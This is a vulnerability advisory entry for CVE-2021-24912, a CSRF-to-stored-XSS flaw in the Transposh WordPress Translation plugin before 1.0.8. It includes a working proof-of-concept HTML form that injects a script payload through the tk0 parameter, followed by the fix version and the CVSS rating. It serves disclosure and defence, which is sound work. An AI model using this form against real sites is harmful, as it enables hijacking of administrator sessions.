WordPress Plugin Vulnerabilities

Transposh WordPress Translation < 1.0.8 - CSRF to Stored XSS

Description

The plugin does not have CSRF check in its tp_translation AJAX action, which could allow attackers to make authorised users add a translation. Given the lack of sanitisation in the tk0 parameter, this could lead to a Stored Cross-Site Scripting issue which will be executed in the context of a logged in admin

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp_translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="0" />
      <input type="hidden" name="items" value="1" />
      <input type="hidden" name="tk0" value="<script>alert(/XSS-csrf/)</script>" />
      <input type="hidden" name="tr0" value="csrf" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
transposh-translation-filter-for-wordpress
Fixed in 1.0.8

References

CVE
CVE-2021-24912

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Julien Ahrens
Verified
Yes
WPVDB ID
349483e2-3ab5-4573-bc03-b1ebab40584d

Timeline

Publicly Published
2022-02-22 (about 2 years ago)
Added
2022-07-28 (about 1 years ago)
Last Updated
2023-04-28 (about 1 years ago)

Other

Published
Title
Published
2017-01-04
Title
ByREV WP-PICShield - Cross-Site Request Forgery (CSRF)
Published
2024-01-31
Title
Active Products Tables for WooCommerce. Professional products tables for WooCommerce store < 1.0.6.2 - Cross-Site Request Forgery
Published
2024-04-24
Title
CM Tooltip Glossary < 4.3.0 - Settings Update via CSRF
Published
2022-06-20
Title
WP Maintenance Mode & Coming Soon < 2.4.5 - Subscribed Users Deletion via CSRF
Published
2023-07-14
Title
WP Testimonials < 1.4.3 - Widget Deletion via CSRF